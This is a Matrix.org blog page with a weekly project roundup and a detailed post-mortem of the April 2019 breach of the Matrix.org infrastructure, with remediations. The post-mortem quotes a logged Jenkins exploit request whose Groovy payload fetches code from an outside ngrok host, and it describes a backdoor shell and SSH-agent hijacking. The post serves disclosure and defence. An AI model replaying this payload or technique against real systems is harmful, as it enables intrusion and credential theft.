This Week in Matrix 2019-05-10

10.05.2019 00:00 — This Week in Matrix — Ben Parsons

Matrix Live

This week Neil and Matthew are talking about recent security issues - it's a really long and detailed chat, but you can skip to around the 32-minute mark to hear about other news, including progress on reactions. Reminder that for a good "big picture" overview of the progress of Matrix, you can look at the Homeserver High Level Roadmap.

Dept of Servers

Synapse

Neil, Synapse-dev wrangler:

Work on reactions continues at full speed: we have a draft PR and will be implementing over the coming week. The ability to blacklist IPs over federation will land imminently, as will a fix for a nasty device management bug that led to a spate of E2E errors. Next week is all about reactions, resuming work on the small-homeserver project, and finally getting back to Synapse 1.0 blockers following all the remediation drama of the past few weeks. With any luck we’ll have a new Synapse release for you next week.

Dept of Encryption

Pantalaimon

Says poljar:

  • Pantalaimon gained support for a configuration file, which adds the ability to configure multiple homeservers; pantalaimon will expose each configured homeserver on a different TCP port (see the sketch below this list).
  • The panctl utility has received support for more commands: it can now accept and confirm SAS requests, import/export keys, list pan users, and list users' devices. Completions for the commands were also added.
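
For reference, pantalaimon is configured with an ini-style file; a minimal sketch for two homeservers might look like this (values are illustrative - check pantalaimon's docs for the exact keys supported by your version):

  [local-matrix]
  Homeserver = https://localhost:8448
  ListenAddress = localhost
  ListenPort = 8009

  [matrix-org]
  Homeserver = https://matrix.org
  ListenAddress = localhost
  ListenPort = 8010

Clients then point at localhost:8009 or localhost:8010 instead of the homeserver directly, and pantalaimon handles the E2EE transparently.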

Dept of Clients

Pattle - big update!

Wilko announced:

A new version of Pattle is available on F-droid!

Lots of changes again, including:

  • Render HTML formatting in messages!
  • Replies are now rendered!
  • Show date headers between messages of different days!
  • Render usernames with a color in chat timeline
  • Add loading indicators (when logging in, loading chats, etc.)
  • Show error banner at the top if syncing failed
  • Syncing now resumes after a failed attempt (no more restarting)
  • Fix messages not being sent if connection was lost and the app restarted

To install Pattle, add the following repo in F-droid:

https://fdroid.pattle.im/?fingerprint=E91F63CA6AE04F8E7EA53E52242EAF8779559209B8A342F152F9E7265E3EA729

Follow development here and in #pattle:matrix.org!

Fractal

Alexandre Franke:

Although the development pace has been reduced lately, the Fractal team managed to make significant progress towards the 4.2 release. More specifically since our previous news, Chris has landed much of his adaptive view work to get Fractal in a mobile friendly state so it’s ready to run on the Librem 5 once Purism starts shipping them. But he didn’t stop there: eager to see his awesome work in the hands of many people (figuratively, the literal application will have to wait for the phone to be out 😛) as soon as possible, he tackled a few bugs that we really wanted to get sorted out before we got a new version out.

Alexandre also prepared the changelog with a bird’s-eye view of all changes that happened since 4.0.

Last but not least, we had a few external contributions for features such as network proxy support and typing notifications.

Riot Web

Progress on message composer for editing messages.

Riot iOS

  • 0.8.6 was released on Tuesday
  • We are working on reactions

Riot Android

  • We have fixed some minor bugs; our efforts are now focused on RiotX
  • New F-Droid mode supporting a high service level, regardless of battery usage.

RiotX (Android)

  • Benoit has started to implement crypto on RiotX. Basically all the legacy code has been imported and a migration to the new architecture is done. Lots of plumbing and rework, but it should be the fastest way to support crypto on RiotX.
  • Valere is working on the emoji picker and reactions, and has also added some actions on events (copy, share, view source, etc.)
  • François has added room invitation support. It will be possible soon to see invitations, and accept or reject them.

continuum

yuforia has news on continuum, a JavaFX-based client.

this week in continuum

  • right-click on a room in the room list to send invitations
  • experimental support for receiving invitations
  • membership data is now also persisted in the database

FluffyChat available as a Snap package, plus E2EE progress

Krille announced FluffyChat for Linux desktops:

FluffyChat is now also available as a Snap package for desktop Linux
https://snapcraft.io/fluffychat :D
It's a Matrix client written in QML for Ubuntu Phones; now it works on desktop Linux too.

He also has news to share re E2E:

Progress has been made on end-to-end encryption for FluffyChat. QML bindings for the libolm library are mostly ready, and the app can now create keys and upload them to the server. Device tracking is implemented too.

E2E when? SOON! See the branch here: https://gitlab.com/ChristianPauly/fluffychat/tree/e2eencryption

Dept of Bridges

New Hangouts bridge from tulir / mautrix

tulir has been using his mautrix-python lib, which was recently used to enable his mautrix-facebook bridge, to bring a new method for Matrix-Hangouts bridging:

New bridge again, this time it's Hangouts: https://github.com/tulir/mautrix-hangouts / #hangouts:maunium.net. As with the Messenger bridge, currently the main difference to matrix-puppet-hangouts is multi-user support (also no hacky JS/Python mixing).

Before making mautrix-hangouts, I put a bunch of the generic bridging parts of mautrix-facebook into mautrix-python's bridge module and used that in both bridges. After Debian 10 is released, I'll drop Python 3.5 compatibility in mautrix-telegram and move it to use mautrix-python and the bridge module too.

Next week I'm planning on adding a bunch of features to both my new bridges, such as bridging formatting and remaining media types (so no new bridges planned for now :D).

Dept of SDKs and Frameworks

QMatrixClient is now "Quotient"

kitsune:

The vote on a new name for the QMatrixClient project has been going on over the past week.
We have a winner now, and the new name is "Quotient"! In the coming weeks, expect changes in the library code (it's going to be libQuotient from the next release), room aliases (already ongoing), links to the repos, etc. Where possible, we're going to smooth the migration path by providing legacy fallbacks (e.g. the new C++ namespace, Quotient, will be introduced, but the old one, QMatrixClient, will stay as its synonym, although deprecated).
Just in case you missed all the previous mentions of the topic: the rename only applies to the overall project and the library, not the client - its name remains Quaternion.
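
For library users, that kind of backwards-compatible rename is typically done with a namespace alias; a sketch of what the migration path could look like (illustrative only, not the actual library code):

  // New canonical namespace from the next release:
  namespace Quotient {
      class Connection;
      // ... the rest of the library's types
  }

  // Legacy synonym so existing code keeps compiling, to be marked deprecated:
  namespace QMatrixClient = Quotient;

Existing code referring to QMatrixClient::Connection keeps working while new code adopts Quotient::Connection.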

Why rename?

Because the previous name was a bit clumsy and, most importantly, the project is no longer focused just on the client side but on a wider set of applications of Matrix (no homeserver in the plans, though). See also the recent backlog of #qmatrixclient:matrix.org (now also #quotient:matrix.org) from earlier this week for the whole discussion.

Ruby Matrix SDK hits v0.1.0

Ananace:

Just published version 0.1.0 of the Ruby Matrix SDK, and I've gotten enough testing written now that I feel comfortable not marking this as a pre-production release. So feel free to integrate it into more than just prototypes and experiments. 😃
Relevant links: GitHub page, #ruby-matrix-sdk:kittenface.studio.

Opsdroid big updates, with focus on Matrix

Cadair:

Opsdroid 0.15 has been released, with a lot of Matrix-focused updates, the biggest of which is support for sending and receiving images and files. There have also been a bunch of bug fixes, such as clean exit of the matrix connector and correct handling of events which are not parsed. There are also a bunch of non-Matrix-specific changes, like support for the awesome parse library for string matching. Read all about it in the release blog: https://medium.com/opsdroid/event-dispatching-simple-parsing-and-more-in-v0-15-3f721b8a6d6c

PK interfaces for ruby_olm

Willem:

This week I've been adding PK interfaces to cjhdev's Ruby bindings for Olm, in preparation for improving my Tchap proxy. The PK interfaces can be found in my fork of ruby_olm. Building the native extensions for the gem has had a major overhaul, so no pull request yet.

Dept of Ops

matrix-docker-ansible-deploy update

It's been a few weeks since we heard from Slavi about matrix-docker-ansible-deploy, but he's been working away on it:

We haven't shared any matrix-docker-ansible-deploy updates lately, but we've had lots of community contributions.

Most of it has been bug fixes and various internal improvements, but we've also landed a few large features. Here's what's most interesting lately:

Dept of Status of Matrix

jaywink, maintainer of https://the-federation.info, told us what we all know to be true: Matrix is great and is getting more popular:

Matrix (Synapse) jumps to second place on https://the-federation.info, a site which lists servers of the federated social web. Help us map the true size of the Matrixverse by adding your server at https://the-federation.info/register/yourdomain.tld. Note: SRV and well-known lookups are not yet working, so registration needs to happen with the Matrix server's real domain (and port, if any).

That's all I know

See you next week, and be sure to stop by #twim:matrix.org with your updates!

PS to people who would normally be reading this in their own RSS reader - I apologise, we'll get the full-article feed back up soon.

Post-mortem and remediations for Apr 11 security incident

08.05.2019 00:00 — General, Security — Matthew Hodgson

Introduction

Hi all,

On April 11th we dealt with a major security incident impacting the infrastructure which runs the Matrix.org homeserver - specifically: removing an attacker who had gained superuser access to much of our production network. We provided updates at the time as events unfolded on April 11 and 12 via Twitter and our blog, but in this post we’ll try to give a full analysis of what happened and, critically, what we have done to avoid this happening again in future. Apologies that this has taken several weeks to put together: the time-consuming process of rebuilding after the breach has had to take priority, and we also wanted to get the key remediation work in place before writing up the post-mortem.

Firstly, please understand that this incident was not due to issues in the Matrix protocol itself or the wider Matrix network - and indeed everyone who wasn’t on the Matrix.org server should have barely noticed. If you see someone say “Matrix got hacked”, please politely but firmly explain to them that the servers which run the oldest and biggest instance got compromised via a Jenkins vulnerability and bad ops practices, but the protocol and network themselves were not impacted. This is not to say that the Matrix protocol itself is bug-free - indeed we are still in the process of exiting beta (delayed by this incident) - but this incident was not related to the protocol.

Before we get stuck in, we would like to apologise unreservedly to everyone impacted by this whole incident. Matrix is an altruistic open source project, and our mission is to try to make the world a better place by providing a secure decentralised communication protocol and network for the benefit of everyone; giving users total control back over how they communicate online.

In this instance, our focus on trying to improve the protocol and network came at the expense of investing sysadmin time around the legacy Matrix.org homeserver and project infrastructure which we provide as a free public service to help bootstrap the Matrix ecosystem, and we paid the price.

This post will hopefully illustrate that we have learnt our lessons from this incident and will not be repeating them - and indeed intend to come out of this episode stronger than you can possibly imagine :)

Meanwhile, if you think that the world needs Matrix, please consider supporting us via Patreon or Liberapay. Not only will this make it easier for us to invest in our infrastructure in future, it also makes projects like Pantalaimon (E2EE compatibility for all Matrix clients/bots) possible, which are effectively being financed entirely by donations. The funding we raised in Jan 2018 is not going to last forever, and we are currently looking into new longer-term funding approaches - for which we need your support.

Finally, if you happen across security issues in Matrix or matrix.org’s infrastructure, please please consider disclosing them responsibly to us as per our Security Disclosure Policy, in order to help us improve our security while protecting our users.

History

Firstly, some context about Matrix.org’s infrastructure. The public Matrix.org homeserver and its associated services run across roughly 30 hosts, spanning the actual homeserver, its DBs, load balancers, intranet services, website, bridges, bots, integrations, video conferencing, CI, etc. We provide it as a free public service to the Matrix ecosystem to help bootstrap the network and make life easier for first-time users.

The deployment which was compromised in this incident was mainly set up back in Aug 2017 when we vacated our previous datacenter at short notice, thanks to our funding situation at the time. Previously we had been piggybacking on the well-managed production datacenters of our previous employer, but during the exodus we needed to move as rapidly as possible, and so we spun up a bunch of vanilla Debian boxes on UpCloud and shifted over services as simply as we could. We had no dedicated ops people on the project at that point, so this was a subset of the Synapse and Riot/Web dev teams putting on ops hats to rapidly get set up, whilst also juggling the daily fun of keeping the ever-growing Matrix.org server running and trying to actually develop and improve Matrix itself.

In practice, this meant that some corners were cut that we expected to be able to come back to and address once we had dedicated ops staff on the team. For instance, we skipped setting up a VPN for accessing production in favour of simply SSHing into the servers over the internet. We also went for the simplest possible config management system: checking all the configs for the services into a private git repo. Nor did we spend much time hardening the default Debian installations - for instance, the default image allows root access via SSH and allows SSH agent forwarding, and we didn’t tweak the config. This is particularly unfortunate, given our previous production OS (a customised Debian variant) had got all these things right - but the attitude was that because we’d got this right in the past, we’d easily be able to get it right again in future once we fixed up the hosts with proper configuration management etc.

Separately, we also made the controversial decision to maintain a public-facing Jenkins instance. We did this deliberately, despite the risks associated with running a complicated publicly available service like Jenkins, but reasoned that as a FOSS project, it is imperative that we are transparent and that continuous integration results and artefacts are available and directly visible to all contributors - whether they are part of the core dev team or not. So we put Jenkins on its own host, gave it some macOS build slaves, and resolved to keep an eye open for any security alerts which would require an upgrade.

Lots of stuff then happened over the following months - we secured funding in Jan 2018; the French Government began talking about switching to Matrix around the same time; the pressure of getting Matrix (and Synapse and Riot) out of beta and to a stable 1.0 grew ever stronger; the challenge of handling the ever-increasing traffic on the Matrix.org server soaked up more and more time, and we started to see our first major security incidents (a major DDoS in March 2018, mitigated by shielding behind Cloudflare, and various attacks on the more beta bits of Matrix itself).

The good news was that funding meant that in March 2018 we were able to hire a full-time ops specialist! By this point, however, we had two new critical projects in play to try to ensure long-term funding for the project via New Vector, the startup formed in 2017 to hire the core team: firstly, to build out Modular.im as a commercial-grade Matrix SaaS provider, and secondly, to support France in rolling out their massive Matrix deployment as a flagship example of how Matrix can be used. And so, for better or worse, the brand new ops team was given a very clear mandate: to largely ignore the legacy datacenter infrastructure, and instead focus exclusively on building entirely new, pro-grade infrastructure for Modular.im and France, with the expectation of eventually migrating Matrix.org itself into Modular when ready (or just turning off the Matrix.org server entirely, once we have account portability).

So we ended up with two production environments: the legacy Matrix.org infra, whose shortcomings continued to linger and fester off the radar, and separately all the new Modular.im hosts, which are almost entirely operationally isolated from the legacy datacenter, have their configuration managed exclusively by Ansible, and have sensible SSH configs which disallow root login etc. With 20:20 hindsight, the failure to prioritise hardening the legacy infrastructure is quite a good example of the normalisation of deviance - we had gotten too used to the bad practices; all our attention was going elsewhere; and so we simply failed to prioritise getting back to fix them.

The Incident

The first evidence of things going wrong was a tweet from JaikeySarraf, a security researcher who kindly reached out via DM at the end of Apr 9th to warn us that our Jenkins was outdated after stumbling across it via Google. In practice, our Jenkins was running version 2.117 with plugins which had been updated on an ad hoc basis, and we had indeed missed the security advisory (partially because most of our CI pipelines had moved to TravisCI, CircleCI and Buildkite), so on Apr 10th we updated the Jenkins and investigated whether any vulnerabilities had been exploited.

In this process, we spotted an unrecognised SSH key in /root/.ssh/authorized_keys2 on the Jenkins build server. This was suspicious both due to the key not being in our key DB and the fact the key was stored in the obscure authorized_keys2 file (a legacy location from back when OpenSSH transitioned from SSH1->SSH2). Further inspection showed that 19 hosts in total had the same key present in the same place.

At this point we started doing forensics to understand the scope of the attack and plan the response, as well as taking snapshots of the hosts to protect data in case the attacker realised we were aware and attempted to vandalise or cover their tracks. Findings were:

  • The attacker gained access on Mar 13th by exploiting a remote code execution vulnerability in our unpatched Jenkins, injecting a malicious Groovy payload via Jenkins’ checkScriptCompile endpoint, as captured in our request logs:

matrix.org:443 151.34.xxx.xxx - - [13/Mar/2019:18:46:07 +0000] "GET /jenkins/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0A@GrabResolver(name=%27orange.tw%27,%20root=%27http://5f36xxxx.ngrok.io/jenkins/%27)%0A@Grab(group=%27tw.orange%27,%20module=%270x3a%27,%20version=%27000%27)%0Aimport%20Orange; HTTP/1.1" 500 6083 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0"

  • This allowed them to further compromise a Jenkins slave (Flywheel, an old Mac Pro used mainly for continuous integration testing of Riot/iOS and Riot/Android). The attacker put an SSH key on the box, which was unfortunately exposed to the internet via a high-numbered SSH port for ease of admin by remote users, and placed a trap which waited for any user to SSH into the jenkins user, which would then hijack any available forwarded SSH keys to try to add the attacker’s SSH key to root@ on as many other hosts as possible.
  • On Apr 4th at 12:32 GMT, one of the Riot devops team members SSH’d into the Jenkins slave to perform some admin, forwarding their SSH key for convenience for accessing other boxes while doing so. This triggered the trap, and resulted in the majority of the malicious keys being inserted to the remote hosts.
  • From this point on, the attacker proceeded to explore the network, performing targeted exfiltration of data (e.g. our passbolt database, which is thankfully end-to-end encrypted via GPG) seemingly targeting credentials and data for use in onward exploits, and installing backdoors for later use (e.g. a setuid root shell at /usr/share/bsd-mail/shroot).
  • The majority of access to the hosts occurred between Apr 4th and 6th.
  • There was no evidence of large-scale data exfiltration, based on analysing network logs.
  • There was no evidence of Modular.im hosts having been compromised. (Modular’s provisioning system and DB did run on the old infrastructure, but it was not used to tamper with the modular instances themselves).
  • There was no evidence of the identity server databases having been compromised.
  • There was no evidence of tampering in our source code repositories.
  • There was no evidence of tampering of our distributed software packages.
  • Two more hosts were compromised on Apr 5th by similarly hijacking another developer SSH agent as the dev logged into a production server.

By around 2am on Apr 11th we felt that we had sufficient visibility on the attacker’s behaviour to be able to do a first pass at evicting them by locking down SSH, removing their keys, and blocking as much network traffic as we could.

We then started a full rebuild of the datacenter on the morning of Apr 11th, given that the only responsible course of action when an attacker has acquired root is to salt the earth and start over afresh. This meant rotating all secrets; isolating the old hosts entirely (including ones which appeared to not have been compromised, for safety), spinning up entirely new hosts, and redeploying everything from scratch with the fresh secrets. The process was significantly slowed down by colliding with unplanned maintenance and provisioning issues in the datacenter provider and unexpected delays spent waiting to copy data volumes between datacenters, but by 1am on Apr 12th the core matrix.org server was back up, and we had enough of a website up to publish the initial security incident blog post. (This was actually static HTML, faked by editing the generated WordPress content from the old website. We opted not to transition any WordPress deployments to the new infra, in a bid to keep our attack surface as small as possible going forwards).

Given the production database had been accessed, we had no choice but to drop all access_tokens for matrix.org, to stop the attacker accessing user accounts; this caused a forced logout for all users on the server. We also recommended all users change their passwords, given the salted & hashed (4096 rounds of bcrypt) passwords had likely been exfiltrated.

At about 4am we had enough of the bare necessities back up and running to pause for sleep.

The Defacement

At around 7am, we were woken up to the news that the attacker had managed to replace the matrix.org website with a defacement (as per https://github.com/vector-im/riot-web/issues/9435). It looks like the attacker didn’t think we were being transparent enough in our initial blog post, and wanted to make it very clear that they had access to many hosts, including the production database and had indeed exfiltrated password hashes. Unfortunately it took a few hours for the defacement to get on our radar as our monitoring infrastructure hadn’t yet been fully restored and the normal paging infrastructure wasn’t back up (we now have emergency-emergency-paging for this eventuality).

On inspection, it transpired that the attacker had not compromised the new infrastructure, but had used Cloudflare to repoint the DNS for matrix.org to a defacement site hosted on Github. Now, as part of rotating the secrets which had been compromised via our configuration repositories, we had of course rotated the Cloudflare API key (used to automate changes to our DNS) during the rebuild on Apr 11. When you log into Cloudflare, it looks something like this...

Cloudflare login UI

...where the top account is your personal one, and the bottom one is an admin role account. To rotate the admin API key, we clicked on the admin account to log in as the admin, and then went to the Profile menu, found the API keys and hit the Change API Key button.

Unfortunately, when you do this, it turns out that the API Key it changes is your personal one, rather than the admin one. As a result, in our rush we thought we’d rotated the admin API key, but we hadn’t, thus accidentally enabling the defacement.

To flush out the defacement we logged in directly as the admin user and changed the API key, pointed the DNS back at the right place, and continued on with the rebuild.

The Rebuild

The goal of the rebuild has been to get all the higher priority services back up rapidly - whilst also ensuring that good security practices are in place going forwards. In practice, this meant making some immediate decisions about how to ensure the new infrastructure did not suffer the same issues and fate as the old. Firstly, we ensured the most obvious mistakes that made the breach possible were mitigated:

  • Access via SSH restricted as heavily as possible
  • SSH agent forwarding disabled server-side
  • All configuration to be managed by Ansible, with secrets encrypted in vaults, rather than sitting in a git repo.

Then, whilst reinstating services on the new infra, we opted to review everything being installed for security risks, replacing services with more secure alternatives where needed, even if it slowed down the rebuild. In particular, this meant:

  • Jenkins has been replaced by Buildkite
  • WordPress has been replaced by statically generated sites (e.g. Gatsby)
  • cgit has been replaced by GitLab.
  • Entirely new package building, signing & distribution infrastructure (more on that later)
  • etc.

Now, while we restored the main synapse (homeserver), sydent (identity server), sygnal (push server), databases, load balancers, intranet and website on Apr 11, it’s important to understand that there were over 100 other services running on the infra - which is why it is taking a while to get full parity with where we were before.

In the interest of transparency (and to try to give a sense of scale of the impact of the breach), here is the public-facing service list we restored, showing priority (1 is top, 4 is bottom) and the % restore status as of May 4th:

Service status

Apologies again that it took longer to get some of these services back up than we’d preferred (and that there are still a few pending). Once we got the top priority ones up, we had no choice but to juggle the remainder alongside remediation work, other security work, and actually working on Matrix(!), whilst ensuring that the services we restored were being restored securely.

Remediations

Once the majority of the P1 and P2 services had been restored, on Apr 24 we held a formal retrospective for the team on the whole incident, which in turn kicked off a full security audit over the entirety of our infrastructure and operational processes.

We’d like to share the resulting remediation plan in as much detail as possible, in order to show the approach we are taking, and in case it helps others avoid repeating the mistakes of our past. Inevitably we’re going to have to skip over some of the items, however - after all, remediations imply that there’s something that could be improved, and for obvious reasons we don’t want to dig into areas where remediation work is still ongoing. We will aim to provide an update on these once ongoing work is complete, however.

We should also acknowledge that after being removed from the infra, the attacker chose to file a set of Github issues on Apr 12 to highlight some of the security issues they had taken advantage of during the breach. Their reports matched the findings from our forensics on Apr 10, and their suggested remediations aligned with our plan.

We’ve split the remediation work into the following domains.

SSH

Some of the biggest issues exposed by the security breach concerned our use of SSH, which we’ll take in turn:

SSH agent forwarding should be disabled.

SSH agent forwarding is a beguilingly convenient mechanism which allows a user to ‘forward’ access to their private SSH keys to a remote server whilst logged in, so they can in turn access other servers via SSH from that server. Typical uses are to make it easy to copy files between remote servers via scp or rsync, or to interact with a SCM system such as Github via SSH from a remote server. Your private SSH keys end up available for use by the server for as long as you are logged into it, letting the server impersonate you.

The common wisdom on this tends to be something like: “Only use agent forwarding when connecting to trusted hosts”. For instance, Github’s guide to using SSH agent forwarding says:

Warning: You may be tempted to use a wildcard like Host * to just apply this setting (ForwardAgent: yes) to all SSH connections. That's not really a good idea, as you'd be sharing your local SSH keys with every server you SSH into. They won't have direct access to the keys, but they will be able to use them as you while the connection is established. You should only add servers you trust and that you intend to use with agent forwarding

As a result, several of the team doing ops work had set Host *.matrix.org ForwardAgent: yes in their ssh client configs, thinking “well, what can we trust if not our own servers?”

This was a massive, massive mistake.

If there is one lesson everyone should learn from this whole mess, it is: SSH agent forwarding is incredibly unsafe, and in general you should never use it. Not only can malicious code running on the server as that user (or root) hijack your credentials, but your credentials can in turn be used to access hosts behind your network perimeter which might otherwise be inaccessible. All it takes is for someone to have snuck malicious code onto your server, waiting for you to log in with a forwarded agent, and boom - even if it was just a one-off ssh -A.

Our remediations for this are:

  • Disable all ssh agent forwarding on the servers.
  • If you need to jump through a box to ssh into another box, use ssh -J $host (see the config sketch after this list).
  • This can also be used with rsync via rsync -e "ssh -J $host"
  • If you need to copy files between machines, use rsync rather than scp (OpenSSH 8.0’s release notes explicitly recommend using more modern protocols than scp).
  • If you need to regularly copy stuff from one server to another (or use SSH to GitHub to check out something from a private repo), it might be better to have a specific SSH ‘deploy key’ created for this, stored server-side and only able to perform limited actions.
  • If you just need to check out stuff from public git repos, use https rather than git+ssh.
  • Try to educate everyone on the perils of SSH agent forwarding: if our past selves can’t be a good example, they can at least be a horrible warning...
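
Concretely, the client-side config for the jump-host approach might look like this (host names illustrative):

  # ~/.ssh/config
  Host *
      ForwardAgent no      # never expose the local agent to servers

  Host prod-*
      ProxyJump bastion.example.com   # hop via the bastion; keys stay local

  # one-off equivalents:
  #   ssh -J bastion.example.com prod-db1
  #   rsync -e "ssh -J bastion.example.com" ./file prod-db1:/tmp/

Server-side, sshd_config can refuse forwarded agents outright with AllowAgentForwarding no, so a single misconfigured client can’t reintroduce the risk.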

Another approach could be to allow forwarding, but configure your SSH agent to prompt whenever a remote app tries to access your keys. However, not all agents support this (OpenSSH’s does via ssh-add -c, but gnome-keyring for instance doesn’t), and also it might still be possible for a hijacker to race with the valid request to hijack your credentials.
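
For those who do keep an agent loaded, the confirmation mode mentioned above is enabled per key when adding it to OpenSSH’s agent:

  # require a confirmation prompt every time this key is used
  ssh-add -c ~/.ssh/id_ed25519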

SSH should not be exposed to the general internet

Needless to say, SSH is no longer exposed to the general internet. We are rolling out a VPN as the main access to the dev network, with SSH bastion hosts as the only access point into production, using SSH keys to keep access as minimal as possible.

SSH keys should give minimal access

Another major problem was that individual SSH keys gave very broad access. We have gone through and ensured that SSH keys grant the least privilege required by the users in question. In particular, root login should not be available over SSH.

A typical scenario where users might end up with unnecessary access to production is that of developers who simply want to push new code or check its logs. We are mitigating this by switching over to using continuous deployment infrastructure everywhere, rather than developers having to actually SSH into production. For instance, the new matrix.org blog is continuously deployed into production by Buildkite from GitHub without anyone needing to SSH anywhere. Similarly, logs should be available to developers from a logserver in real time, without having to SSH into the actual production host. We’ve already been experimenting internally with sentry for this.

Relatedly, we’ve also shifted to requiring multiple SSH keys per user (per device, and for privileged / unprivileged access), giving us finer-grained control when locking down permissions, revoking keys, etc. (We had actually already started this process, and while it didn’t help prevent the attack, it did assist with forensics.)

Two factor authentication

We are rolling out two-factor authentication for SSH to ensure that even if keys are compromised (e.g. via forwarding hijack), the attacker needs to have also compromised other physical tokens in order to successfully authenticate.
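
One common way to layer a second factor over key-based SSH auth (a sketch assuming a PAM-based TOTP module such as pam_google_authenticator; we’re not describing our exact setup here) is:

  # /etc/ssh/sshd_config - require a key AND a one-time code via PAM
  UsePAM yes
  ChallengeResponseAuthentication yes
  AuthenticationMethods publickey,keyboard-interactive

With this, a stolen or hijacked key alone is not enough to authenticate.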

It should be made as hard as possible to add malicious SSH keys

We’ve decided to stop users from being able to directly manage their own SSH keys in production via ~/.ssh/authorized_keys (or ~/.ssh/authorized_keys2 for that matter) - we can see no benefit from letting non-root users set keys.

Instead, keys for all accounts are managed exclusively by Ansible via /etc/ssh/authorized_keys/$account (using sshd’s AuthorizedKeysFile /etc/ssh/authorized_keys/%u directive).
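
Concretely, the sshd side is the directive quoted above, and the Ansible side can be as simple as a root-owned template (the task below is illustrative):

  # /etc/ssh/sshd_config
  AuthorizedKeysFile /etc/ssh/authorized_keys/%u

  # Illustrative Ansible task; files are root-owned, so users can't edit their own keys
  - name: Install SSH keys for account
    template:
      src: "authorized_keys/{{ account }}.j2"
      dest: "/etc/ssh/authorized_keys/{{ account }}"
      owner: root
      group: root
      mode: "0644"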

Changes to SSH keys should be carefully monitored

If we’d had sufficient monitoring of the SSH configuration, the breach could have been caught instantly. We are addressing this by managing the keys exclusively via Ansible (as above), and also by improving our intrusion detection in general.

Similarly, we are working on tracking changes and additions to other credentials (and enforcing their complexity).

SSH config should be hardened, disabling unnecessary options

If we’d gone through reviewing the default sshd config when we set up the datacenter in the first place, we’d have caught several of these failure modes at the outset. We’ve now done so (as per above).

We’d like to recommend that openssh packages start shipping secure-by-default configurations, as a number of the old options just don’t need to exist on most newly provisioned machines.
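
As an illustration of the kind of baseline we mean (not our exact config), a hardened sshd_config disables the options that made this attack possible:

  # /etc/ssh/sshd_config - illustrative hardened baseline
  PermitRootLogin no
  PasswordAuthentication no
  AllowAgentForwarding no
  X11Forwarding no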

Network architecture

As mentioned in the History section, the legacy network infrastructure effectively grew organically, without really having a core network or a good split between different production environments.

We are addressing this by:

  • Splitting our infrastructure into strictly separated service domains, which are firewalled from each other and can only access each other via their respective ‘front doors’ (e.g. HTTPS APIs exposed at the loadbalancers).
    • Development
    • Intranet
    • Package Build (airgapped; see below for more details)
    • Package Distribution
    • Production, which is in turn split per class of service.
  • Access to these networks will be via VPN + SSH jumpboxes (as per above). Access to the VPN is via per-device certificate + 2FA, and SSH via keys as per above.
  • Switching to an improved internal VPN between hosts within a given network environment (i.e. we don’t trust the datacenter LAN).

We’re also running most services in containers by default going forwards (previously it was a bit of a mix of running unix processes, VMs, and occasional containers), providing an additional level of namespace isolation.

Keeping patched

Needless to say, this particular breach would not have happened had we kept the public-facing Jenkins patched (although there would of course still have been scope for a 0-day attack).

Going forwards, we are establishing a formal regular process for deploying security updates rather than relying on spotting security advisories on an ad hoc basis. We are now also setting up regular vulnerability scans against production so we catch any gaps before attackers do.

Aside from our infrastructure, we’re also extending the process of regularly checking for security updates to cover outdated dependencies in our distributed software (Riot, Synapse, etc.) too, given the discipline of regularly chasing outdated software applies equally to both.

Moving all our machine deployment and configuration into Ansible allows this to be a much simpler task than before.

Intrusion detection

There’s obviously a lot we need to do in terms of spotting future attacks as rapidly as possible. Amongst other strategies, we’re working on real-time log analysis for aberrant behaviour.

Incident management

There is much we have learnt from managing an incident at this scale. The main highlights taken from our internal retrospective are:

  • The need for a single incident manager to coordinate the technical response, prioritisation, and handover between those handling the incident. (We lacked a single incident manager at first, given several of the team started off that week on holiday...)
  • The benefits of gathering all relevant info and checklists onto a canonical set of shared documents rather than being spread across different chatrooms and lost in scrollback.
  • The need to have an existing inventory of services and secrets available for tracking progress and prioritisation
  • The need to have a general incident management checklist for future reference, which folks can familiarise themselves with ahead of time to avoid stuff getting forgotten. The sort of stuff which will go on our checklist in future includes:
    • Remembering to appoint a named incident manager, external comms manager & internal comms manager. (They could of course be the same person, but the roles are distinct).
    • Defining a sensible sequence of forensics, mitigations, communication, rotating secrets etc. to follow, rather than having to work it out on the fly and risk forgetting stuff
    • Remembering to inform the ICO (Information Commissioner’s Office) of any user data breaches
    • Guidelines on how to balance between forensics and rebuilding (i.e. how long to spend on forensics, if at all, before pulling the plug)
    • Reminders to snapshot systems for forensics & backups
    • Reminder to not redesign infrastructure during a rebuild. There were a few instances where we lost time by seizing the opportunity to try to fix design flaws whilst rebuilding, some of which were avoidable.
    • Making sure that communication isn’t sent prematurely to users (e.g. we posted the blog post asking people to update their passwords before password reset had actually been restored - apologies for that.)

Configuration management

One of the major flaws once the attacker was in our network was that our internal configuration git repo was cloned on most accounts on most servers, containing within it a plethora of unencrypted secrets. Config would then get symlinked from the checkout to wherever the app or OS needed it.

This is bad in terms of leaving unencrypted secrets (database passwords, API keys etc) lying around everywhere, but also in terms of being able to automatically maintain configuration and spot unauthorised configuration changes.

Our solution is to switch all configuration management, from the OS upwards, to Ansible (which we had already established for Modular.im), using Ansible vaults to store the encrypted secrets. It’s unfortunate that we had already done the work for this (and even had been giving talks at Ansible meetups about it!) but had not yet applied it to the legacy infrastructure.
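
For anyone unfamiliar with the approach: Ansible Vault keeps secrets encrypted at rest in the repo and only decrypts them at deploy time. File names below are illustrative:

  # encrypt the secrets file in place; the encrypted file is then safe to commit
  ansible-vault encrypt group_vars/matrix/vault.yml

  # playbook runs decrypt on the fly, given the vault passphrase
  ansible-playbook site.yml --ask-vault-pass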

Avoiding temporary measures which last forever

None of this would have happened had we been more disciplined in finishing off the temporary infrastructure from back in 2017. As a general point, we should try to do it right the first time - and failing that, assign responsibility to someone to update it, and responsibility to someone else to check that it happened. In other words, the only way to dig out of temporary measures like this is to project-manage the update, or it will not happen. This is of course a general point not specific to this incident, but one well worth reiterating.

Secure packaging

One of the most unfortunate mistakes highlighted by the breach is that the signing keys for the Synapse debian repository, Riot debian repository and Riot/Android releases on the Google Play Store had ended up on hosts which were compromised during the attack. This is obviously a massive fail, and is a case of the geo-distributed dev teams prioritising the convenience of a near-automated release process without thinking through the security risks of storing keys on a production server.

